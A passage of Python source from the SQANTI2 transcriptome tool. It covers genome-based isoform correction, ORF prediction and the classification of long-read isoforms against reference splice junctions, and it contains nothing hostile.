r.cds_exons = []
if s!='NA' and e!='NA': # has ORF prediction for this isoform
if r.strand == '+':
assert s < e
s = s - 1 # make it 0-based
else:
assert e < s
s, e = e, s
s = s - 1 # make it 0-based
for i,exon in enumerate(r.ref_exons):
if exon.end > s: break
r.cds_exons = [Interval(s, min(e,exon.end))]
for exon in r.ref_exons[i+1:]:
if exon.start > e: break
r.cds_exons.append(Interval(exon.start, min(e, exon.end)))
write_collapseGFF_format(f, r)
def get_corr_filenames(args, dir=None):
d = dir if dir is not None else args.dir
corrPathPrefix = os.path.join(d, args.output)
corrGTF = corrPathPrefix +"_corrected.gtf"
corrSAM = corrPathPrefix +"_corrected.sam"
corrFASTA = corrPathPrefix +"_corrected.fasta"
corrORF = corrPathPrefix +"_corrected.faa"
return corrGTF, corrSAM, corrFASTA, corrORF
def get_class_junc_filenames(args, dir=None):
d = dir if dir is not None else args.dir
outputPathPrefix = os.path.join(d, args.output)
outputClassPath = outputPathPrefix + "_classification.txt"
outputJuncPath = outputPathPrefix + "_junctions.txt"
return outputClassPath, outputJuncPath
def correctionPlusORFpred(args, genome_dict):
"""
Use the reference genome to correct the sequences (unless a pre-corrected GTF is given)
"""
global corrORF
global corrGTF
global corrSAM
global corrFASTA
corrGTF, corrSAM, corrFASTA, corrORF = get_corr_filenames(args)
n_cpu = max(1, args.cpus // args.chunks)
# Step 1. IF GFF or GTF is provided, make it into a genome-based fasta
# IF sequence is provided, align as SAM then correct with genome
if os.path.exists(corrFASTA):
print("Error corrected FASTA {0} already exists. Using it...".format(corrFASTA), file=sys.stderr)
else:
if not args.gtf:
if os.path.exists(corrSAM):
print("Aligned SAM {0} already exists. Using it...".format(corrSAM), file=sys.stderr)
else:
if args.aligner_choice == "gmap":
print("****Aligning reads with GMAP...", file=sys.stdout)
cmd = GMAP_CMD.format(cpus=n_cpu,
dir=os.path.dirname(args.gmap_index),
name=os.path.basename(args.gmap_index),
sense=args.sense,
i=args.isoforms,
o=corrSAM)
elif args.aligner_choice == "minimap2":
print("****Aligning reads with Minimap2...", file=sys.stdout)
cmd = MINIMAP2_CMD.format(cpus=n_cpu,
sense=args.sense,
g=args.genome,
i=args.isoforms,
o=corrSAM)
elif args.aligner_choice == "deSALT":
print("****Aligning reads with deSALT...", file=sys.stdout)
cmd = DESALT_CMD.format(cpus=n_cpu,
dir=args.gmap_index,
i=args.isoforms,
o=corrSAM)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running alignment cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
# if is fusion - go in and change the IDs to reflect PBfusion.X.1, PBfusion.X.2...
if args.is_fusion:
corrSAM = rewrite_sam_for_fusion_ids(corrSAM)
# error correct the genome (input: corrSAM, output: corrFASTA)
err_correct(args.genome, corrSAM, corrFASTA, genome_dict=genome_dict)
# convert SAM to GFF --> GTF
convert_sam_to_gff3(corrSAM, corrGTF+'.tmp', source=os.path.basename(args.genome).split('.')[0]) # convert SAM to GFF3
cmd = "{p} {o}.tmp -T -o {o}".format(o=corrGTF, p=GFFREAD_PROG)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
else:
print("Skipping aligning of sequences because GTF file was provided.", file=sys.stdout)
ind = 0
with open(args.isoforms, 'r') as isoforms_gtf:
for line in isoforms_gtf:
if line[0] != "#" and len(line.split("\t"))!=9:
sys.stderr.write("\nERROR: input isoforms file with not GTF format.\n")
sys.exit()
elif len(line.split("\t"))==9:
ind += 1
if ind == 0:
print("WARNING: GTF has {0} no annotation lines.".format(args.isoforms), file=sys.stderr)
# GFF to GTF (in case the user provides gff instead of gtf)
corrGTF_tpm = corrGTF+".tmp"
try:
subprocess.call([GFFREAD_PROG, args.isoforms , '-T', '-o', corrGTF_tpm])
except (RuntimeError, TypeError, NameError):
sys.stderr.write('ERROR: File %s without GTF/GFF format.\n' % args.isoforms)
raise SystemExit(1)
# check if gtf chromosomes inside genome file
with open(corrGTF, 'w') as corrGTF_out:
with open(corrGTF_tpm, 'r') as isoforms_gtf:
for line in isoforms_gtf:
if line[0] != "#":
chrom = line.split("\t")[0]
type = line.split("\t")[2]
if chrom not in list(genome_dict.keys()):
sys.stderr.write("\nERROR: gtf \"%s\" chromosome not found in genome reference file.\n" % (chrom))
sys.exit()
elif type in ('transcript', 'exon'):
corrGTF_out.write(line)
os.remove(corrGTF_tpm)
if not os.path.exists(corrSAM):
sys.stdout.write("\nIndels will be not calculated since you ran SQANTI2 without alignment step (SQANTI2 with gtf format as transcriptome input).\n")
# GTF to FASTA
subprocess.call([GFFREAD_PROG, corrGTF, '-g', args.genome, '-w', corrFASTA])
# ORF generation
print("**** Predicting ORF sequences...", file=sys.stdout)
gmst_dir = os.path.join(os.path.abspath(args.dir), "GMST")
gmst_pre = os.path.join(gmst_dir, "GMST_tmp")
if not os.path.exists(gmst_dir):
os.makedirs(gmst_dir)
# sequence ID example: PB.2.1 gene_4|GeneMark.hmm|264_aa|+|888|1682
gmst_rex = re.compile('(\S+\t\S+\|GeneMark.hmm)\|(\d+)_aa\|(\S)\|(\d+)\|(\d+)')
orfDict = {} # GMST seq id --> myQueryProteins object
if args.skipORF:
print("WARNING: Skipping ORF prediction because user requested it. All isoforms will be non-coding!", file=sys.stderr)
elif os.path.exists(corrORF):
print("ORF file {0} already exists. Using it....".format(corrORF), file=sys.stderr)
for r in SeqIO.parse(open(corrORF), 'fasta'):
# now process ORFs into myQueryProtein objects
m = gmst_rex.match(r.description)
if m is None:
print("Expected GMST output IDs to be of format '<pbid> gene_4|GeneMark.hmm|<orf>_aa|<strand>|<cds_start>|<cds_end>' but instead saw: {0}! Abort!".format(r.description), file=sys.stderr)
sys.exit(-1)
orf_length = int(m.group(2))
cds_start = int(m.group(4))
cds_end = int(m.group(5))
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=r.id)
else:
cur_dir = os.path.abspath(os.getcwd())
os.chdir(args.dir)
cmd = GMST_CMD.format(i=corrFASTA, o=gmst_pre)
if subprocess.check_call(cmd, shell=True, cwd=gmst_dir)!=0:
print("ERROR running GMST cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
os.chdir(cur_dir)
# Modifying ORF sequences by removing sequence before ATG
with open(corrORF, "w") as f:
for r in SeqIO.parse(open(gmst_pre+'.faa'), 'fasta'):
m = gmst_rex.match(r.description)
if m is None:
print("Expected GMST output IDs to be of format '<pbid> gene_4|GeneMark.hmm|<orf>_aa|<strand>|<cds_start>|<cds_end>' but instead saw: {0}! Abort!".format(r.description), file=sys.stderr)
sys.exit(-1)
id_pre = m.group(1)
orf_length = int(m.group(2))
orf_strand = m.group(3)
cds_start = int(m.group(4))
cds_end = int(m.group(5))
pos = r.seq.find('M')
if pos!=-1:
# must modify both the sequence ID and the sequence
orf_length -= pos
cds_start += pos*3
newid = "{0}|{1}_aa|{2}|{3}|{4}".format(id_pre, orf_length, orf_strand, cds_start, cds_end)
newseq = str(r.seq)[pos:]
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=newid)
f.write(">{0}\n{1}\n".format(newid, newseq))
else:
new_rec = r
orfDict[r.id] = myQueryProteins(cds_start, cds_end, orf_length, proteinID=r.id)
f.write(">{0}\n{1}\n".format(new_rec.description, new_rec.seq))
if len(orfDict) == 0:
print("WARNING: All input isoforms were predicted as non-coding", file=sys.stderr)
return(orfDict)
def reference_parser(args, genome_chroms):
"""
Read the reference GTF file
:param args:
:param genome_chroms: list of chromosome names from the genome fasta, used for sanity checking
:return: (refs_1exon_by_chr, refs_exons_by_chr, junctions_by_chr, junctions_by_gene)
"""
global referenceFiles
referenceFiles = os.path.join(args.dir, "refAnnotation_"+args.output+".genePred")
print("**** Parsing Reference Transcriptome....", file=sys.stdout)
if os.path.exists(referenceFiles):
print("{0} already exists. Using it.".format(referenceFiles), file=sys.stdout)
else:
## gtf to genePred
if not args.geneid:
subprocess.call([GTF2GENEPRED_PROG, args.annotation, referenceFiles, '-genePredExt', '-allErrors', '-ignoreGroupsWithoutExons', '-geneNameAsName2'])
else:
subprocess.call([GTF2GENEPRED_PROG, args.annotation, referenceFiles, '-genePredExt', '-allErrors', '-ignoreGroupsWithoutExons'])
## parse reference annotation
# 1. ignore all miRNAs (< 200 bp)
# 2. separately store single exon and multi-exon references
refs_1exon_by_chr = defaultdict(lambda: IntervalTree()) #
refs_exons_by_chr = defaultdict(lambda: IntervalTree())
# store donors as the exon end (1-based) and acceptor as the exon start (0-based)
# will convert the sets to sorted list later
junctions_by_chr = defaultdict(lambda: {'donors': set(), 'acceptors': set(), 'da_pairs': set()})
# dict of gene name --> set of junctions (don't need to record chromosome)
junctions_by_gene = defaultdict(lambda: set())
# dict of gene name --> list of known begins and ends (begin always < end, regardless of strand)
known_5_3_by_gene = defaultdict(lambda: {'begin':set(), 'end': set()})
for r in genePredReader(referenceFiles):
if r.length < args.min_ref_len: continue # ignore miRNAs
if r.exonCount == 1:
refs_1exon_by_chr[r.chrom].insert(r.txStart, r.txEnd, r)
known_5_3_by_gene[r.gene]['begin'].add(r.txStart)
known_5_3_by_gene[r.gene]['end'].add(r.txEnd)
else:
refs_exons_by_chr[r.chrom].insert(r.txStart, r.txEnd, r)
# only store junctions for multi-exon transcripts
for d, a in r.junctions:
junctions_by_chr[r.chrom]['donors'].add(d)
junctions_by_chr[r.chrom]['acceptors'].add(a)
junctions_by_chr[r.chrom]['da_pairs'].add((d,a))
junctions_by_gene[r.gene].add((d,a))
known_5_3_by_gene[r.gene]['begin'].add(r.txStart)
known_5_3_by_gene[r.gene]['end'].add(r.txEnd)
# check that all genes' chromosomes are in the genome file
ref_chroms = set(refs_1exon_by_chr.keys()).union(list(refs_exons_by_chr.keys()))
diff = ref_chroms.difference(genome_chroms)
if len(diff) > 0:
print("WARNING: ref annotation contains chromosomes not in genome: {0}\n".format(",".join(diff)), file=sys.stderr)
# convert the content of junctions_by_chr to sorted list
for k in junctions_by_chr:
junctions_by_chr[k]['donors'] = list(junctions_by_chr[k]['donors'])
junctions_by_chr[k]['donors'].sort()
junctions_by_chr[k]['acceptors'] = list(junctions_by_chr[k]['acceptors'])
junctions_by_chr[k]['acceptors'].sort()
junctions_by_chr[k]['da_pairs'] = list(junctions_by_chr[k]['da_pairs'])
junctions_by_chr[k]['da_pairs'].sort()
return dict(refs_1exon_by_chr), dict(refs_exons_by_chr), dict(junctions_by_chr), dict(junctions_by_gene), dict(known_5_3_by_gene)
def isoforms_parser(args):
"""
Parse input isoforms (GTF) to dict (chr --> sorted list)
"""
global queryFile
queryFile = os.path.splitext(corrGTF)[0] +".genePred"
print("**** Parsing Isoforms....", file=sys.stderr)
# gtf to genePred
cmd = GTF2GENEPRED_PROG + " {0} {1} -genePredExt -allErrors -ignoreGroupsWithoutExons".format(\
corrGTF, queryFile)
if subprocess.check_call(cmd, shell=True)!=0:
print("ERROR running cmd: {0}".format(cmd), file=sys.stderr)
sys.exit(-1)
isoforms_list = defaultdict(lambda: []) # chr --> list to be sorted later
for r in genePredReader(queryFile):
isoforms_list[r.chrom].append(r)
for k in isoforms_list:
isoforms_list[k].sort(key=lambda r: r.txStart)
return isoforms_list
def STARcov_parser(coverageFiles): # just valid with unstrand-specific RNA-seq protocols.
"""
:param coverageFiles: comma-separated list of STAR junction output files or a directory containing junction files
:return: list of samples, dict of (chrom,strand) --> (0-based start, 1-based end) --> {dict of sample -> unique reads supporting this junction}
"""
cov_files = glob.glob(coverageFiles)
print("Input pattern: {0}. The following files found and to be read as junctions:\n{1}".format(\
coverageFiles, "\n".join(cov_files) ), file=sys.stderr)
cov_by_chrom_strand = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: 0)))
undefined_strand_count = 0
all_read = 0
samples = []
for file in cov_files:
prefix = os.path.basename(file[:file.rfind('.')]) # use this as sample name
samples.append(prefix)
for r in STARJunctionReader(file):
if r.strand == 'NA':
# undefined strand, so we put them in BOTH strands otherwise we'll lose all non-canonical junctions from STAR
cov_by_chrom_strand[(r.chrom, '+')][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
cov_by_chrom_strand[(r.chrom, '-')][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
undefined_strand_count += 1
else:
cov_by_chrom_strand[(r.chrom, r.strand)][(r.start, r.end)][prefix] = r.unique_count + r.multi_count
all_read += 1
print("{0} junctions read. {1} junctions added to both strands because no strand information from STAR.".format(all_read, undefined_strand_count), file=sys.stderr)
return samples, cov_by_chrom_strand
EXP_KALLISTO_HEADERS = ['target_id', 'length', 'eff_length', 'est_counts', 'tpm']
EXP_RSEM_HEADERS = ['transcript_id', 'length', 'effective_length', 'expected_count', 'TPM']
def expression_parser(expressionFile):
"""
Currently accepts expression format: Kallisto or RSEM
:param expressionFile: Kallisto or RSEM
:return: dict of PBID --> TPM
"""
reader = DictReader(open(expressionFile), delimiter='\t')
if all(k in reader.fieldnames for k in EXP_KALLISTO_HEADERS):
print("Detected Kallisto expression format. Using 'target_id' and 'tpm' field.", file=sys.stderr)
name_id, name_tpm = 'target_id', 'tpm'
elif all(k in reader.fieldnames for k in EXP_RSEM_HEADERS):
print("Detected RSEM expression format. Using 'transcript_id' and 'TPM' field.", file=sys.stderr)
name_id, name_tpm = 'transcript_id', 'TPM'
else:
print("Expected Kallisto or RSEM file format from {0}. Abort!".format(expressionFile), file=sys.stderr)
exp_dict = {}
for r in reader:
exp_dict[r[name_id]] = float(r[name_tpm])
return exp_dict
def transcriptsKnownSpliceSites(refs_1exon_by_chr, refs_exons_by_chr, start_ends_by_gene, trec, genome_dict, nPolyA):
"""
:param refs_1exon_by_chr: dict of single exon references (chr -> IntervalTree)
:param refs_exons_by_chr: dict of multi exon references (chr -> IntervalTree)
:param trec: id record (genePredRecord) to be compared against reference
:param genome_dict: dict of genome (chrom --> SeqRecord)
:param nPolyA: window size to look for polyA
:return: myQueryTranscripts object that indicates the best reference hit
"""
def calc_overlap(s1, e1, s2, e2):
if s1=='NA' or s2=='NA': return 0
if s1 > s2:
s1, e1, s2, e2 = s2, e2, s1, e1
return max(0, min(e1,e2)-max(s1,s2))
def gene_overlap(ref1, ref2):
if ref1==ref2: return True # same gene, diff isoforms
# return True if the two reference genes overlap
s1, e1 = min(start_ends_by_gene[ref1]['begin']), max(start_ends_by_gene[ref1]['end'])
s2, e2 = min(start_ends_by_gene[ref2]['begin']), max(start_ends_by_gene[ref2]['end'])
if s1 <= s2:
return e1 <= s2
else:
return e2 <= s1
def calc_splicesite_agreement(query_exons, ref_exons):
q_sites = {}
for e in query_exons:
q_sites[e.start] = 0
q_sites[e.end] = 0
for e in ref_exons:
if e.start in q_sites: q_sites[e.start] = 1
if e.end in q_sites: q_sites[e.end] = 1
return sum(q_sites.values())
def calc_exon_overlap(query_exons, ref_exons):
q_bases = {}
for e in query_exons:
for b in range(e.start, e.end): q_bases[b] = 0
for e in ref_exons:
for b in range(e.start, e.end):
if b in q_bases: q_bases[b] = 1
return sum(q_bases.values())
def get_diff_tss_tts(trec, ref):
if trec.strand == '+':
diff_tss = trec.txStart - ref.txStart
diff_tts = ref.txEnd - trec.txEnd
else:
diff_tts = trec.txStart - ref.txStart
diff_tss = ref.txEnd - trec.txEnd
return diff_tss, diff_tts
def get_gene_diff_tss_tts(isoform_hit):
# now that we know the reference (isoform) it hits
# add the nearest start/end site for that gene (all isoforms of the gene)
nearest_start_diff, nearest_end_diff = float('inf'), float('inf')
for ref_gene in isoform_hit.genes:
for x in start_ends_by_gene[ref_gene]['begin']:
d = trec.txStart - x
if abs(d) < abs(nearest_start_diff):
nearest_start_diff = d
for x in start_ends_by_gene[ref_gene]['end']:
d = trec.txEnd - x
if abs(d) < abs(nearest_end_diff):
nearest_end_diff = d
if trec.strand == '+':
isoform_hit.tss_gene_diff = nearest_start_diff if nearest_start_diff!=float('inf') else 'NA'
isoform_hit.tts_gene_diff = nearest_end_diff if nearest_end_diff!=float('inf') else 'NA'
else:
isoform_hit.tss_gene_diff = -nearest_end_diff if nearest_start_diff!=float('inf') else 'NA'
isoform_hit.tts_gene_diff = -nearest_start_diff if nearest_end_diff!=float('inf') else 'NA'
def categorize_incomplete_matches(trec, ref):
"""
intron_retention --- at least one trec exon covers at least two adjacent ref exons
complete --- all junctions agree and is not IR
5prime_fragment --- all junctions agree but trec has less 5' exons
3prime_fragment --- all junctions agree but trec has less 3' exons
internal_fragment --- all junctions agree but trec has less 5' and 3' exons
"""
# check intron retention
ref_exon_tree = IntervalTree()
for i,e in enumerate(ref.exons): ref_exon_tree.insert(e.start, e.end, i)
for e in trec.exons:
if len(ref_exon_tree.find(e.start, e.end)) > 1: # multiple ref exons covered
return "intron_retention"
agree_front = trec.junctions[0]==ref.junctions[0]
agree_end = trec.junctions[-1]==ref.junctions[-1]
if agree_front:
if agree_end:
return "complete"
else: # front agrees, end does not
return ("3prime_fragment" if trec.strand=='+' else '5prime_fragment')
else:
if agree_end: # front does not agree, end agrees
return ("5prime_fragment" if trec.strand=='+' else '3prime_fragment')
else:
return "internal_fragment"
# Transcript information for a single query id and comparison with reference.
# Intra-priming: calculate percentage of "A"s right after the end
if trec.strand == "+":
pos_TTS = trec.exonEnds[-1]
seq_downTTS = str(genome_dict[trec.chrom].seq[pos_TTS:pos_TTS+nPolyA]).upper()
else: # id on - strand
pos_TTS = trec.exonStarts[0]
seq_downTTS = str(genome_dict[trec.chrom].seq[pos_TTS-nPolyA:pos_TTS].reverse_complement()).upper()
percA = float(seq_downTTS.count('A'))/nPolyA*100
isoform_hit = myQueryTranscripts(id=trec.id, tts_diff="NA", tss_diff="NA",\
num_exons=trec.exonCount,
length=trec.length,
str_class="", \
chrom=trec.chrom,
strand=trec.strand, \
subtype="no_subcategory",\
percAdownTTS=str(percA),\
seqAdownTTS=seq_downTTS)
##***************************************##
########### SPLICED TRANSCRIPTS ###########
##***************************************##
cat_ranking = {'full-splice_match': 5, 'incomplete-splice_match': 4, 'anyKnownJunction': 3, 'anyKnownSpliceSite': 2,
'geneOverlap': 1, '': 0}
#if trec.id.startswith('PB.1961.2'):
# pdb.set_trace()
if trec.exonCount >= 2:
hits_by_gene = defaultdict(lambda: []) # gene --> list of hits
best_by_gene = {} # gene --> best isoform_hit
if trec.chrom in refs_exons_by_chr:
for ref in refs_exons_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
hits_by_gene[ref.gene].append(ref)
if trec.chrom in refs_1exon_by_chr:
for ref in refs_1exon_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
hits_by_gene[ref.gene].append(ref)
if len(hits_by_gene) == 0: return isoform_hit
for ref_gene in hits_by_gene:
isoform_hit = myQueryTranscripts(id=trec.id, tts_diff="NA", tss_diff="NA", \
num_exons=trec.exonCount,
length=trec.length,
str_class="", \
chrom=trec.chrom,
strand=trec.strand, \
subtype="no_subcategory", \
percAdownTTS=str(percA), \
seqAdownTTS=seq_downTTS)
for ref in hits_by_gene[ref_gene]:
if trec.strand != ref.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
#if trec.id.startswith('PB.102.9'):
# pdb.set_trace()
if ref.exonCount == 1: # mono-exonic reference, handle specially here
if calc_exon_overlap(trec.exons, ref.exons) > 0 and cat_ranking[isoform_hit.str_class] < cat_ranking["geneOverlap"]:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
"geneOverlap",
subtype="mono-exon",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=0,
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
else: # multi-exonic reference
match_type = compare_junctions(trec, ref, internal_fuzzy_max_dist=0, max_5_diff=999999, max_3_diff=999999)
if match_type not in ('exact', 'subset', 'partial', 'concordant', 'super', 'nomatch'):
raise Exception("Unknown match category {0}!".format(match_type))
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
#has_overlap = gene_overlap(isoform_hit.genes[-1], ref.gene) if len(isoform_hit.genes) >= 1 else Fals
# #############################
# SQANTI's full-splice_match
# #############################
if match_type == "exact":
subtype = "multi-exon"
# assign as a new hit if
# (1) no prev hits yet
# (2) this one is better (prev not FSM or is FSM but worse tss/tts)
if cat_ranking[isoform_hit.str_class] < cat_ranking["full-splice_match"] or \
abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff():
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length,
str_class="full-splice_match",
subtype=subtype,
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen = ref.length,
refExons= ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
# #######################################################
# SQANTI's incomplete-splice_match
# (only check if don't already have a FSM match)
# #######################################################
elif match_type == "subset":
subtype = categorize_incomplete_matches(trec, ref)
# assign as a new (ISM) hit if
# (1) no prev hit
# (2) prev hit not as good (is ISM with worse tss/tts or anyKnownSpliceSite)
if cat_ranking[isoform_hit.str_class] < cat_ranking["incomplete-splice_match"] or \
(isoform_hit.str_class=='incomplete-splice_match' and abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff()):
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length,
str_class="incomplete-splice_match",
subtype=subtype,
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen = ref.length,
refExons= ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
# #######################################################
# Some kind of junction match that isn't ISM/FSM
# #######################################################
elif match_type in ('partial', 'concordant', 'super'):
q_sp_hit = calc_splicesite_agreement(trec.exons, ref.exons)
q_ex_overlap = calc_exon_overlap(trec.exons, ref.exons)
q_exon_d = abs(trec.exonCount - ref.exonCount)
if cat_ranking[isoform_hit.str_class] < cat_ranking["anyKnownJunction"] or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit > isoform_hit.q_splicesite_hit) or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit==isoform_hit.q_splicesite_hit and q_ex_overlap > isoform_hit.q_exon_overlap) or \
(isoform_hit.str_class=='anyKnownJunction' and q_sp_hit==isoform_hit.q_splicesite_hit and q_exon_d < abs(trec.exonCount-isoform_hit.refExons)):
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="anyKnownJunction",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
else: # must be nomatch
assert match_type == 'nomatch'
# at this point, no junction overlap, but may be a single splice site (donor or acceptor) match?
# also possibly just exonic (no splice site) overlap
if cat_ranking[isoform_hit.str_class] < cat_ranking["anyKnownSpliceSite"] and calc_splicesite_agreement(trec.exons, ref.exons) > 0:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="anyKnownSpliceSite",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons,
ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
if isoform_hit.str_class=="": # still not hit yet, check exonic overlap
if cat_ranking[isoform_hit.str_class] < cat_ranking["geneOverlap"] and calc_exon_overlap(trec.exons, ref.exons) > 0:
isoform_hit = myQueryTranscripts(trec.id, "NA", "NA", trec.exonCount, trec.length,
str_class="geneOverlap",
subtype="no_subcategory",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=["novel"],
refLen=ref.length,
refExons=ref.exonCount,
refStart=ref.txStart,
refEnd=ref.txEnd,
q_splicesite_hit=calc_splicesite_agreement(trec.exons, ref.exons),
q_exon_overlap=calc_exon_overlap(trec.exons, ref.exons),
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
best_by_gene[ref_gene] = isoform_hit
# now we have best_by_gene:
# start with the best scoring one (FSM is best) --> can add other genes if they don't overlap
#if trec.id.startswith('PB.1252.'):
# pdb.set_trace()
geneHitTuple = namedtuple('geneHitTuple', ['score', 'rStart', 'rEnd', 'rGene', 'iso_hit'])
best_by_gene = [geneHitTuple(cat_ranking[iso_hit.str_class],iso_hit.refStart,iso_hit.refEnd,ref_gene,iso_hit) for ref_gene,iso_hit in best_by_gene.items()]
best_by_gene = list(filter(lambda x: x.score > 0, best_by_gene))
if len(best_by_gene) == 0: # no hit
return isoform_hit
# sort matching genes by ranking, allow for multi-gene match as long as they don't overlap
# cat_ranking = {'full-splice_match': 5, 'incomplete-splice_match': 4, 'anyKnownJunction': 3, 'anyKnownSpliceSite': 2,
# 'geneOverlap': 1, '': 0}
best_by_gene.sort(key=lambda x: (x.score,x.iso_hit.q_splicesite_hit+(x.iso_hit.q_exon_overlap)*1./sum(e.end-e.start for e in trec.exons)+calc_overlap(x.rStart,x.rEnd,trec.txStart,trec.txEnd)*1./(x.rEnd-x.rStart)-abs(trec.exonCount-x.iso_hit.refExons)), reverse=True) # sort by (ranking score, overlap)
isoform_hit = best_by_gene[0].iso_hit
cur_start, cur_end = best_by_gene[0].rStart, best_by_gene[0].rEnd
for t in best_by_gene[1:]:
if t.score==0: break
if calc_overlap(cur_start, cur_end, t.rStart, t.rEnd) <= 0:
isoform_hit.genes.append(t.rGene)
cur_start, cur_end = min(cur_start, t.rStart), max(cur_end, t.rEnd)
##***************************************####
########### UNSPLICED TRANSCRIPTS ###########
##***************************************####
else: # single exon id
if trec.chrom in refs_1exon_by_chr:
for ref in refs_1exon_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
if ref.strand != trec.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
# see if there's already an existing match AND if so, if this one is better
if isoform_hit.str_class == "": # no match so far
isoform_hit = myQueryTranscripts(trec.id, diff_tss, diff_tts, trec.exonCount, trec.length, "full-splice_match",
subtype="mono-exon",
chrom=trec.chrom,
strand=trec.strand,
genes=[ref.gene],
transcripts=[ref.id],
refLen=ref.length,
refExons = ref.exonCount,
percAdownTTS=str(percA),
seqAdownTTS=seq_downTTS)
elif abs(diff_tss)+abs(diff_tts) < isoform_hit.get_total_diff():
isoform_hit.modify(ref.id, ref.gene, diff_tss, diff_tts, ref.length, ref.exonCount)
if isoform_hit.str_class == "" and trec.chrom in refs_exons_by_chr:
# no hits to single exon genes, let's see if it hits multi-exon genes
# (1) if it overlaps with a ref exon and is contained in an exon, we call it ISM
# (2) else, if it is completely within a ref gene start-end region, we call it NIC by intron retention
for ref in refs_exons_by_chr[trec.chrom].find(trec.txStart, trec.txEnd):
if calc_exon_overlap(trec.exons, ref.exons) == 0: # no exonic overlap, skip!
continue
if ref.strand != trec.strand:
# opposite strand, just record it in AS_genes
isoform_hit.AS_genes.add(ref.gene)
continue
diff_tss, diff_tts = get_diff_tss_tts(trec, ref)
for e in ref.exons:
if e.start <= trec.txStart < trec.txEnd <= e.end:
isoform_hit.str_class = "incomplete-splice_match"
isoform_hit.subtype = "mono-exon"
isoform_hit.modify(ref.id, ref.gene, diff_tss, diff_tts, ref.length, ref.exonCount)
# this is as good a match as it gets, we can stop the search here
get_gene_diff_tss_tts(isoform_hit)
return isoform_hit
# if we haven't exited here, then ISM hit is not found yet
# instead check if it's NIC by intron retention
# but we don't exit here since the next gene could be a ISM hit
if ref.txStart <= trec.txStart < trec.txEnd <= ref.txEnd:
isoform_hit.str_class = "novel_in_catalog"
isoform_hit.subtype = "mono-exon"
# check for intron retention
if len(ref.junctions) > 0:
for (d,a) in ref.junctions:
if trec.txStart < d < a < trec.txEnd:
isoform_hit.subtype = "mono-exon_by_intron_retention"
break
isoform_hit.modify("novel", ref.gene, 'NA', 'NA', ref.length, ref.exonCount)
get_gene_diff_tss_tts(isoform_hit)
return isoform_hit
# if we get to here, means neither ISM nor NIC, so just add a ref gene and categorize further later
isoform_hit.genes.append(ref.gene)
get_gene_diff_tss_tts(isoform_hit)
isoform_hit.genes.sort(key=lambda x: start_ends_by_gene[x]['begin'])
return isoform_hit
def novelIsoformsKnownGenes(isoforms_hit, trec, junctions_by_chr, junctions_by_gene, start_ends_by_gene):
"""
At this point: definitely not FSM or ISM, see if it is NIC, NNC, or fusion
:return isoforms_hit: updated isoforms hit (myQueryTranscripts object)
"""
def has_intron_retention():
for e in trec.exons:
m = bisect.bisect_left(junctions_by_chr[trec.chrom]['da_pairs'], (e.start, e.end))
if m < len(junctions_by_chr[trec.chrom]['da_pairs']) and e.start <= junctions_by_chr[trec.chrom]['da_pairs'][m][0] < junctions_by_chr[trec.chrom]['da_pairs'][m][1] < e.end:
return True
